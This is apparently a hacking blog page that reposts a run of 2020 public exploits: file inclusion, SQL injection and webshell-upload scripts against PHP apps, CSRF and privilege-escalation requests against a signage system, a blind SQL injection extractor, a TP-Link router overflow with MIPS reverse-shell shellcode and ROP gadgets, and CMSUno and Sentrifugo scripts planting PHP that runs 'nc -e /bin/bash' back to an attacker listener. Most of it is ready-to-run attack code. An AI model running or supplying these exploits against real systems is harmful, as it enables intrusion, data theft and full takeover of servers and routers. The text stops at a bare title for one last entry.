# Exploit Title: [Local File Inclusion Processwire CMS 2.4.0]
# Vulnerability Type: Unauthenticated LFI
# Date: [03.11.2020]
# Exploit Author: [Y1LD1R1M]
# Type: [WEBAPPS]
# Platform: [PHP]
# Vendor Homepage: [https://processwire.com/]
# Version: [2.4.0]
# Tested on: [Kali Linux]
** Description **
Local File Inclusion in Processwire CMS 2.4.0 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.
** Proof of Concept **
http://URL/index.php?download=/etc/passwd
http://URL/index.php?download=../config.php
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863158220
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14562/school-log-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46
# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz
#!/usr/bin/python3
import requests
import time
def sqli_admin():
s = requests.Session()
data = {"username":"admin'or'1'=1#","password":"hacked"}
adminlogin = "http://localhost/slms/admin/ajax.php?action=save_settings"
s.post(adminlogin,data=data)
return s
def trigger_rce(session):
starttime = int(time.time())
multipart_form_data = {
"name": ("cyberscurity"),
"email": ("test@test.com"),
"contact" : ("+11111111111"),
"about" : ("Nothing much about it"),
"img" : ("shell.php", open("shell.php", "rb"))
}
session.post("http://localhost/slms/admin/ajax.php?action=save_settings", files=multipart_form_data)
get_shell(starttime-100,starttime+100,session)
def get_shell(start,end,session):
for i in range(start,end):
session.get("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
response = requests.get ("http://localhost/slms/admin/assets/uploads/"+ str(i) +"_shell.php")
if response.status_code == 200:
print("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
def main():
session = sqli_admin()
trigger_rce(session)
if __name__ == '__main__':
main()
# Exploit Title: PDW File Browser 1.3 - Remote Code Execution
# Date: 24-10-2020
# Exploit Author: David Bimmel
# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
# Vendor Homepage: n/a
# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
# Version: <=1.3
Attack type
Remote
Impact
Remote Code Execution
The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a critical software vulnerability which results in remote code execution on the web server. This vulnerability can be exploited by all authenticated users.
Steps to RCE:
Upload a .txt file containing your webshell code using the default file upload functionality within the PDF file Browser. Please note that all users (including unauthenticated users) are able to access your webshell later on. For security purposes I would recommend using weevely (https://github.com/epinna/weevely3) as this obfuscated and password protects your webshell. Below I have provided how the request should look like for uploading your WEBSHELL.txt file.
POST /ckeditor/plugins/pdw_file_browser/ajax_php_uploader.php?uploadpath=%2Fmedia%2F&qqfile=WEBSHELL.txt HTTP/1.1
Host: <HOSTNAME>
[…]
<?php
<WEBSHELLCODE HERE>
?>
Once you have uploaded your webshell with a .txt extension (WEBSHELL.txt) you are able to rename the file using the rename functionality of the PDW File Browser.
Within this functionality it is possible to both change the file extension your WEBSHELL from .txt to .php and move the file to an arbitrary location on the web server . The path to the arbitrary location should contain double encoded characters.
Below I have provided an example which both renames our WEBSHELL.txt to WEBSHELL.php and relocates the file to the 'content' directory.
POST /ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1
Host: <HOSTNAME>
[…]
action=rename&new_filename=%252E%252E%252Fcontent%252FWEBSHELL.php&old_filename=WEBSHELL.txt&folder=%252Fmedia%252F&type=file
After this request your webshell should be located at ‘https://<TARGET>/content/WEBSHELL.php’
Happy Hacking :^)
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)
# Date: 2020-07-16
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.yerootech.com
# Version: 6.2
iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery (CSRF)
Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page: http://www.yerootech.com
Affected version: V6.2 B2014.12.12.1220
V5.6 B2017.07.12.1757
V4.3
Summary: iDS6 Software's DSSPro network digital signage management system
is a web-based server software solution for Windows.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Microsoft Windows XP
Microsoft Windows 7
Microsfot Windows Server 2008
Microsoft Windows Server 2012
Microsoft Windows 10
Apache Tomcat/8.0.44
Apache Tomcat/6.0.35
Apache-Coyote/1.1
Apache Axis/1.4
MySQL 5.5.25
Java 1.8.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5606
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5606.php
16.07.2020
--
Add user:
---------
<html>
<body>
<form action="http://192.168.1.88/Pages/user!addUser" method="POST">
<input type="hidden" name="user.userName" value="testingus" />
<input type="hidden" name="user.password" value="zeroscience" />
<input type="submit" value="add()" />
</form>
</body>
</html>
# Exploit Title: Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46
# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz
#!/usr/bin/python3
import requests
import time
def sqli_admin():
s = requests.Session()
data = {"username":"admin'or'1'=1#","password":"mosaaed"}
adminlogin = "http://localhost/sta/ajax.php?action=save_settings"
s.post(adminlogin,data=data)
return s
def trigger_rce(session):
starttime = int(time.time())
multipart_form_data = {
"name": ("cyberscurity"),
"email": ("test@test.com"),
"contact" : ("+11111111111"),
"about" : ("attack"),
"img" : ("shell.php", open("shell.php", "rb"))
}
session.post("http://localhost/sta/ajax.php?action=save_settings", files=multipart_form_data)
get_shell(starttime-100,starttime+100,session)
def get_shell(start,end,session):
for i in range(start,end):
session.get("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
response = requests.get ("http://localhost/sta/assets/uploads/"+ str(i) +"_shell.php")
if response.status_code == 200:
print("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
def main():
session = sqli_admin()
trigger_rce(session)
if __name__ == '__main__':
main()
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass
# Date: 2020-07-16
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.yerootech.com
# Version: 6.2
iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass
Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page: http://www.yerootech.com
Affected version: V6.2 B2014.12.12.1220
V5.6 B2017.07.12.1757
V4.3
Summary: iDS6 Software's DSSPro network digital signage management
system is a web-based server software solution for Windows.
Desc: The CAPTCHA function for DSSPro is prone to a security bypass
vulnerability that occurs in the CAPTCHA authentication routine. By
requesting the autoLoginVerifyCode object an attacker can receive a
JSON message code and successfully bypass the CAPTCHA-based authentication
challenge and perform brute-force attacks.
Tested on: Microsoft Windows XP
Microsoft Windows 7
Microsfot Windows Server 2008
Microsoft Windows Server 2012
Microsoft Windows 10
Apache Tomcat/8.0.44
Apache Tomcat/6.0.35
Apache-Coyote/1.1
Apache Axis/1.4
MySQL 5.5.25
Java 1.8.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5607
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php
16.07.2020
--
Get CAPTCHA code:
-----------------
$ curl -i http://192.168.1.88/Pages/login\!autoLoginVerifyCode -c cookies.txt
{"success":true,"message":"6435","data":"6435"}
Use CAPTCHA code:
-----------------
$ curl -i http://192.168.1.88/Pages/login\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.autosave=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-json;charset=UTF-8
Date: Tue, 21 Jul 2020 19:41:26 GMT
Connection: close
Content-Length: 16
{"success":true}
# Exploit Title: Amarok 2.8.0 - Denial-of-Service
# Date: 1 November 2020
# Exploit Author: FishballAndMeatball
# Vendor Homepage: https://amarok.kde.org/
# Software link: https://community.kde.org/Amarok/GettingStarted/Download
# Version: Amarok 2.8.0
# Tested on: Windows 10, Windows 7, Windows XP
# CVE: CVE-2020-13152
my $file= “test_big.m3u“;
my $junk= “\x41” x 6368545;
open($FILE,”>$file”);
print $FILE “$junk”;
close($FILE);
print “m3u File Created successfully\n”;
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation
# Date: 2020-07-16
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.yerootech.com
# Version: 6.2
iDS6 DSSPro Digital Signage System 6.2 Improper Access Control Privilege Escalation
Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page: http://www.yerootech.com
Affected version: V6.2 B2014.12.12.1220
V5.6 B2017.07.12.1757
V4.3
Summary: iDS6 Software's DSSPro network digital signage management system
is a web-based server software solution for Windows.
Desc: The application suffers from a privilege escalation vulnerability.
An authenticated user can elevate his/her privileges by calling JS functions
from the console or by insecure direct object references to hidden functionalities
that can result in creating users, modifying roles and permissions and full
takeover of the application.
Tested on: Microsoft Windows XP
Microsoft Windows 7
Microsfot Windows Server 2008
Microsoft Windows Server 2012
Microsoft Windows 10
Apache Tomcat/8.0.44
Apache Tomcat/6.0.35
Apache-Coyote/1.1
Apache Axis/1.4
MySQL 5.5.25
Java 1.8.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5608
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5608.php
16.07.2020
--
--------------------
Default credentials:
--------------------
admin:123456 (id: n/k, access: /admin)
boss:boss (id: 100001, access: /)
user:user (id: 100002, access: /)
----------------------------
Once logged-in, create user:
----------------------------
In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action)
Type: add()
or issue a POST request:
$ curl -d "user.userName=testingus&user.password=testingus" http://192.168.1.88/Pages/user\!addUser -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
--------------
List user IDs:
--------------
$ curl -d "az=asc" http://192.168.1.88/Pages/user\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
------------
Create role:
------------
In Console, once navigated to the Accounts->Role page (http://192.168.1.88/Pages/role.action):
Type: add()
or issue a POST request:
$ curl -d "role.roleName=ROLENAME&role.description=ROLEDESC" http://192.168.1.88/Pages/role\!add -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
--------------
List role IDs:
--------------
$ curl -X POST http://192.168.1.88/Pages/role\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
------------------------------------------
Apply all permissions to the created role:
------------------------------------------
$ curl http://192.168.1.88/Pages/role\!updatePermissions -d "role.roleId={ROLE_ID}&privileges=2&privileges=1&privileges=3&privileges=4&privileges=7&privileges=6&privileges=5&privileges=12&privileges=8&privileges=13&privileges=9&privileges=10&privileges=11&privileges=14&privileges=16&privileges=15&privileges=17&privileges=18&privileges=21&privileges=33&privileges=32&privileges=34&privileges=35&privileges=36&privileges=37&privileges=23&privileges=22&privileges=24&privileges=41&privileges=47&privileges=46&privileges=48&privileges=49&privileges=50&privileges=51&privileges=52&privileges=53"
------------------------------------
Assign created role to created user:
------------------------------------
$ curl -d "user.userId={USER_ID}&roles={ROLE_ID}" http://192.168.1.88/Pages/user\!updateRole -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
------------
Delete user:
------------
In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action), select desired username:
Type: del()
or issue a POST request:
$ curl -d "userid={USER_ID}" http://192.168.1.88/Pages/user\!del -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
# Exploit Title: SmartBlog 2.0.1 - 'id_post' Blind SQL injection
# Date: 2020-11-05
# Exploit Author: C0wnuts
# Vendor Homepage: https://github.com/smartdatasoft/smartblog
# Version: 2.0.1
# Tested on: Linux
# Description : A blind SQL injection is present in the "id_post" parameter of the "details" controller. It allows you to extract information from the database by means of successive character tests.
# POC:
# -------------------------
# http://localhost/[script_path]/index.php?fc=module&module=smartblog&id_post=<valid post number> or {SQL}&controller=details
# -------------------------
# Exemple:
# 1. Test if the first character of the database name is "t":
# http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring(DATABASE(),1,1)='t'&controller=details
# 2. Test if the first character of the email of the first account is "a":
# http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring((SELECT email FROM ps_employee LIMIT 1 offset 0),1,1)='a'&controller=details
# -------------------------
# Script PYTHON (python 3)
import requests, string
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
initialUrl = 'https://localhost.com/index.php?fc=module&module=smartblog&id_post=4329824944'
endOfUrl = '&controller=details'
# Change this to http:// if the website is not in https
protocol = "https://"
offset = 0
endData = 0
end = 0
iteration = 0
charList = string.printable
# The character returned by the db when you reach the end of the extracted information. In my case that was "+" but it can be "\", or " " or whatever. /!\ Just test and hange this value according to your needs /!\
endChar = "+"
# The length of the page when the SQLI failed. In my case that was 16094. If the lenght of the content of the page is higher than this value is that the character tested is the right one. /!\ Just test and hange this value according to your needs /!\.
FailPageLen = 17000
# Mysql is not case sensitive but if the db used by the website is cse sensitive remove the following line
charList = charList.replace("ABCDEFGHIJKLMNOPQRSTUVWXYZ","")
while endData == 0:
contentInfo = ""
iteration = 0
end = 0
while end == 0:
iteration = iteration + 1
for elem in charList:
url = initialUrl
#This request get email of all employee. Replace the request by whatever you want but keep in mind that the script extract information 1 character by 1 character then you need to keep '+str(offset)+' and substring(,'+str(iteration)+',1). "elem" is the character tested
request = '%20or%20substring((SELECT%20email%20FROM%20ps_employee%20LIMIT%201%20offset%20'+str(offset)+'),'+str(iteration)+',1)=%27'+elem+'%27'
url += request + endOfUrl
retry_strategy = Retry(
total = 30,
backoff_factor = 0.2,
method_whitelist = ["GET" "POST"]
)
adapter = HTTPAdapter(max_retries=retry_strategy)
http = requests.Session()
http.mount(protocol, adapter)
response = http.get("{}".format(url))
if len(response.content) > FailPageLen:
print(contentInfo)
if(elem == endChar):
end = 1
if contentInfo == "":
endData = 1
else:
contentInfo = contentInfo + elem
break
if contentInfo == "":
endData = 1
print(contentInfo)
offset = offset + 1
# Exploit Title: TP-Link WDR4300 - Remote Code Execution (Authenticated)
# Date: 2020-08-28
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://www.tp-link.com/se/home-networking/wifi-router/tl-wdr4300/
# Version: TL-WDR4300, N750 Wireless Dual Band Gigabit Router
# Tested on: Firmware version 3.13.33 and 3.14.3
# CVE : CVE-2017-13772
#!/usr/bin/python3
import sys
import hashlib
import base64
import requests
import binascii
import socket
"""
RCE via stack-based overflow on TP-Link WDR4300 (N750) devices, using CVE-2017-13772.
Tested on Firmware versions 3.13.33, Build 130618 and 3.14.3 Build 150518, hardware WDR4300 v1
Usage:
1) Start listener on attacker machine: nc -nlvvp 31337
2) Execute script: python exploit.py <attacker_ip>
"""
def main(argv):
if len(sys.argv) < 2:
print("Usage: python exploit.py <attacker_ip>")
sys.exit(1)
password = "admin"
target = "192.168.0.1:80"
attacker_ip = sys.argv[1]
attacker = binascii.hexlify(socket.inet_aton(attacker_ip))
ip = [attacker[i:i+2] for i in range(0, len(attacker), 2)]
if '00' in ip or '20' in ip:
print("[-] Specified attacker IP will result in bad characters being present in the shellcode. Avoid any IPs containing .0. and .32.")
sys.exit(1)
url = "http://" + target + "/"
try:
r = requests.get(url=url)
except:
print("[-] Could not connect to target: " + target)
sys.exit(1)
if 'WWW-Authenticate' in r.headers.keys():
if not 'WDR4300' in r.headers['WWW-Authenticate']:
print("[-] This is not TP-Link WDR4300 (N750)")
sys.exit(1)
else:
print("[-] This does not seem to be the web interface of a router!")
credentials = "admin" + ":" + hashlib.md5(password).hexdigest()
auth = base64.b64encode(credentials)
url = "http://" + target + "/userRpm/LoginRpm.htm?Save=Save"
print("[+] Setting target to: " + target)
print("[+] Using default admin password: " + password)
print("[+] Cookie set to: Authorization=Basic%20" + auth)
h = {}
h["Cookie"] = "Authorization=Basic%20" + auth
h['Upgrade-Insecure-Requests'] = '1'
h['Referer'] = 'http://' + target + '/'
r = requests.get(url = url, headers=h)
data = r.text
if "httpAutErrorArray" in data:
print('[-] Could not login to the admin interface')
sys.exit(1)
older_fw = False
# older firmware, e.g., 3.13.33
if "<TITLE>Login Incorrect</TITLE>" in data:
print("[-] Incorrect login, perhaps an older firmware? Sending digest authetnication using the Authorization header instead..")
credentials = "admin:" + password
auth = base64.b64encode(credentials)
url = "http://" + target + "/"
h = {}
h["Authorization"] = "Basic%20" + auth
h['Upgrade-Insecure-Requests'] = '1'
h['Referer'] = 'http://' + target + '/'
r = requests.get(url = url, headers=h)
data = r.text
if 'window.parent.location.href' not in data:
print("[-] Failed to login to the admin interface")
sys.exit(1)
print('[+] Older firmware confirmed, successfully logged in')
older_fw = True
authenticated_url = data.split('window.parent.location.href = ')[1].split(';')[0].replace('"','')
unique_id = ''
if not older_fw:
unique_id = authenticated_url.split('/userRpm')[0].split('/')[3] + '/'
print("[+] Authentication succeeded, got unique id: " + unique_id.replace('/',''))
# now we deliver the exploit payload via a GET request
h['Referer'] = 'http://' + target + '/' + unique_id + 'userRpm/DiagnosticRpm.htm'
# NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
nopsled = ""
for i in range(12):
nopsled += "\x26\x40\x08\x01"
# identified bad characters: 0x20,0x00
# Using reverse tcp shellcode from https://www.exploit-db.com/exploits/45541
buf = b""
buf += "\x24\x0f\xff\xfa" # li $t7, -6
buf += "\x01\xe0\x78\x27" # nor $t7, $zero
buf += "\x21\xe4\xff\xfd" # addi $a0, $t7, -3
buf += "\x21\xe5\xff\xfd" # addi $a1, $t7, -3
buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1
buf += "\x24\x02\x10\x57" # li $v0, 4183 ( sys_socket )
buf += "\x01\x01\x01\x0c" # syscall 0x40404
buf += "\xaf\xa2\xff\xff" # sw $v0, -1($sp)
buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp)
buf += "\x34\x0f\xff\xfd" # li $t7, -3 ( sa_family = AF_INET )
buf += "\x01\xe0\x78\x27" # nor $t7, $zero
buf += "\xaf\xaf\xff\xe0" # sw $t7, -0x20($sp)
buf += "\x3c\x0e\x7a\x69" # lui $t6, 0x7a69 ( sin_port = 0x7a69 )
buf += "\x35\xce\x7a\x69" # ori $t6, $t6, 0x7a69
buf += "\xaf\xae\xff\xe4" # sw $t6, -0x1c($sp)
buf += "\x3c\x0e" + ip[0].decode('hex') + ip[1].decode('hex') # lui $t6, 0xAABB ( sin_addr = 0xAABB ...
buf += "\x35\xce" + ip[2].decode('hex') + ip[3].decode('hex') # ori $t6, $t6, 0xCCDD ... 0xCCDD
buf += "\xaf\xae\xff\xe6" # sw $t6, -0x1a($sp)
buf += "\x27\xa5\xff\xe2" # addiu $a1, $sp, -0x1e
buf += "\x24\x0c\xff\xef" # li $t4, -17 ( addrlen = 16 )
buf += "\x01\x80\x30\x27" # nor $a2, $t4, $zero
buf += "\x24\x02\x10\x4a" # li $v0, 4170 ( sys_connect )
buf += "\x01\x01\x01\x0c" # syscall 0x40404
buf += "\x24\x0f\xff\xfd" # li t7,-3
buf += "\x01\xe0\x28\x27" # nor a1,t7,zero
buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp)
buf += "\x24\x02\x0f\xdf" # li $v0, 4063 ( sys_dup2 )
buf += "\x01\x01\x01\x0c" # syscall 0x40404
buf += "\x24\xa5\xff\xff" # addi a1,a1,-1 (\x20\xa5\xff\xff)
buf += "\x24\x01\xff\xff" # li at,-1
buf += "\x14\xa1\xff\xfb" # bne a1,at, dup2_loop
buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1
buf += "\x3c\x0f\x2f\x2f" # lui $t7, 0x2f2f
buf += "\x35\xef\x62\x69" # ori $t7, $t7, 0x6269
buf += "\xaf\xaf\xff\xec" # sw $t7, -0x14($sp)
buf += "\x3c\x0e\x6e\x2f" # lui $t6, 0x6e2f
buf += "\x35\xce\x73\x68" # ori $t6, $t6, 0x7368
buf += "\xaf\xae\xff\xf0" # sw $t6, -0x10($sp)
buf += "\xaf\xa0\xff\xf4" # sw $zero, -0xc($sp)
buf += "\x27\xa4\xff\xec" # addiu $a0, $sp, -0x14
buf += "\xaf\xa4\xff\xf8" # sw $a0, -8($sp)
buf += "\xaf\xa0\xff\xfc" # sw $zero, -4($sp)
buf += "\x27\xa5\xff\xf8" # addiu $a1, $sp, -8
buf += "\x24\x02\x0f\xab" # li $v0, 4011 (sys_execve)
buf += "\x01\x01\x01\x0c" # syscall 0x40404
shellcode = nopsled + buf
"""
We control $ra, $s0 and $s1 via the buffer overflow.
libc_base: 0x2aae2000
First ROP (sleep_gadget): 0x0004c974 + libc_base = 0x2ab2e974
0x0004c97c move t9, s0
0x0004c980 lw ra, (var_1ch)
0x0004c984 lw s0, (var_18h)
0x0004c988 addiu a0, zero, 2 ; arg1
0x0004c98c addiu a1, zero, 1 ; arg2
0x0004c990 move a2, zero
0x0004c994 jr t9
sleep is located at 0x00053ca0 => so $s0 = 0x2ab35ca0
This gadget calls sleep, in this gadget we also set the return adress to the second ROP gadget which is controlled by setting appropriate value on the stack location 0x1c($sp), i.e., the first value on the stack, due to the instruction at 0x0004c980.
Second ROP (stack_gadget): 0x00039fa8 + libc_base = 0x2ab1bfa8
0x00039fa8 addiu s0, sp, 0x28
0x00039fac move a0, s3
0x00039fb0 move a1, s0
0x00039fb4 move t9, s1
0x00039fb8 jalr t9
This gadget will set s0 to point our shellcode on the stack, that must be located at sp+0x28.
Then as we control s1, we jump to the last and third ROP gadget.
Third ROP (call_gadget): 0x000406d8 + libc_base = 0x2ab226d8
0x000406d8 move t9, s0
0x000406dc jalr t9
Jump to the shellcode pointed in s0.
"""
sleep_addr = "\x2a\xb3\x5c\xa0"
sleep_gadget = "\x2a\xb2\xe9\x74"
stack_gadget = "\x2a\xb1\xbf\xa8"
call_gadget = "\x2a\xb2\x26\xd8"
junk = "J"*28
payload = "A"*160 + sleep_addr + call_gadget + sleep_gadget + junk + stack_gadget + shellcode
p = {'ping_addr': payload, 'doType': 'ping', 'isNew': 'new', 'sendNum': '4', 'pSize':64, 'overTime':'800', 'trHops':'20'}
url = "http://" + target + "/" + unique_id + "userRpm/PingIframeRpm.htm"
print("[+] Delivering exploit payload to: " + url)
try:
r = requests.get(url = url, params=p, headers=h, timeout=10)
except:
print("[+] Finished delivering exploit")
if __name__ == "__main__":
main(sys.argv[1:])
# Exploit Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020.09.30
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://github.com/boiteasite/cmsuno/
# Software Link: https://github.com/boiteasite/cmsuno/
# Blog: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html
# Version: 1.6.2
# Tested on: Kali Linux 2020.2
import requests
from bs4 import BeautifulSoup
import lxml
import json
username = input("username: ")
password = input("password: ")
root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
listener_ip = input("Your ip: ")
listener_port = input("Your port for reverse shell: ")
login_url = root_url + "/uno.php"
vulnerable_url = root_url + "/uno/central.php"
session = requests.Session()
request = session.get(login_url)
# Get the unox value
soup = BeautifulSoup(request.text,"lxml")
unox = soup.find("input",{'name':'unox'})['value']
# Login
body = {"unox":unox,"user":username,"pass":password}
session.post(login_url, data=body)
# Get the second unox value
request = session.get(login_url)
unox = soup.find("input",{'name':'unox'})['value']
# Exploit
header = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
"Accept":"*/",
"Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest",
"Origin": login_url,
"Connection": "close",
"Referer": login_url
}
payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port)
while True:
body = 'action=sauvePass&unox={}&user0=&pass0=&user=&pass=&lang={}'.format(unox,payload)
session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header)
request = session.get(login_url)
text = request.text
soup = BeautifulSoup(text,"lxml")
script = soup.findAll('script')[1].string
data = script.split("Unox='")[1]
unox = data.split("',")[0]
# Exploit Title: Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020.10.06
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://sourceforge.net/projects/sentrifugo/
# Software Link: https://sourceforge.net/projects/sentrifugo/
# Blog: https://fatihhcelik.blogspot.com/2020/10/sentrifugo-version-32-rce-authenticated.html
# Version: 3.2
# Tested on: Kali Linux 2020.2
# CVE : N/A
import requests
from bs4 import BeautifulSoup
from ast import literal_eval
'''
You should change the below hardcoded inputs to get a reverse shell.
'''
login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave"
upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/announcements/uploadsave"
call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/ca_temp/"
username = "xxx"
password = "xxx"
attacker_ip = "XXX.XXX.XXX.XXX"
listener_port = "4444"
# Set proxy for debugging purposes
proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"}
# Log in to the system
session = requests.Session()
request = session.get(login_url)
body = {"username":username,"password":password}
# session.post(login_url, data=body, proxies=proxy)
session.post(login_url, data=body) # Send a request without proxy
print("Logged in to the application..")
# Upload the PHP shell
files = [
('myfile',
('shell.php',
'<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip,listener_port),
'image/jpeg')
)
]
# r = session.post(upload_url, files=files, proxies=proxy)
r = session.post(upload_url, files=files) # Send a request without proxy
response = r.content
dict_str = response.decode("UTF-8")
response = literal_eval(dict_str) # Convert bytes to dictionary
filename = response["filedata"]["new_name"]
url = call_shell + filename
print("PHP file is uploaded --> {}".format(url))
# Trigger the shell
session.get(url)
# Exploit Title: Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020.10.06
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://sourceforge.net/projects/sentrifugo/
# Software Link: https://sourceforge.net/projects/sentrifugo/
# Blog: https://fatihhcelik.blogspot.com/2020/10/sentrifugo-version-32-rce-authenticated_6.html
# Version: 3.2
# Tested on: Kali Linux 2020.2
# CVE : N/A
import requests
from bs4 import BeautifulSoup
from ast import literal_eval
'''
You should change the below hardcoded inputs to get a reverse shell.
'''
login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave"
upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/assets/assets/uploadsave"
call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/assets_images_temp/"
username = "xxxx"
password = "xxxx"
attacker_ip = "XXX.XXX.XXX.XXX"
listener_port = "4444"
# Set proxy for debugging purposes
proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"}
# Log in to the system
session = requests.Session()
request = session.get(login_url)
body = {"username":username,"password":password}
# session.post(login_url, data=body, proxies=proxy)
session.post(login_url, data=body) # Send a request without proxy
print("Logged in to the application..")
# Upload the PHP shell
files = [
('myfile',
('shell.php',
'<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip,listener_port),
'image/jpeg')
)
]
# r = session.post(upload_url, files=files, proxies=proxy)
r = session.post(upload_url, files=files) # Send a request without proxy
response = r.content
dict_str = response.decode("UTF-8")
response = literal_eval(dict_str) # Convert bytes to dictionary
filename = response["filedata"]["new_name"]
url = call_shell + filename
print("PHP file is uploaded --> {}".format(url))
# Trigger the shell
session.get(url)
# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
# Date: 28-08-2020
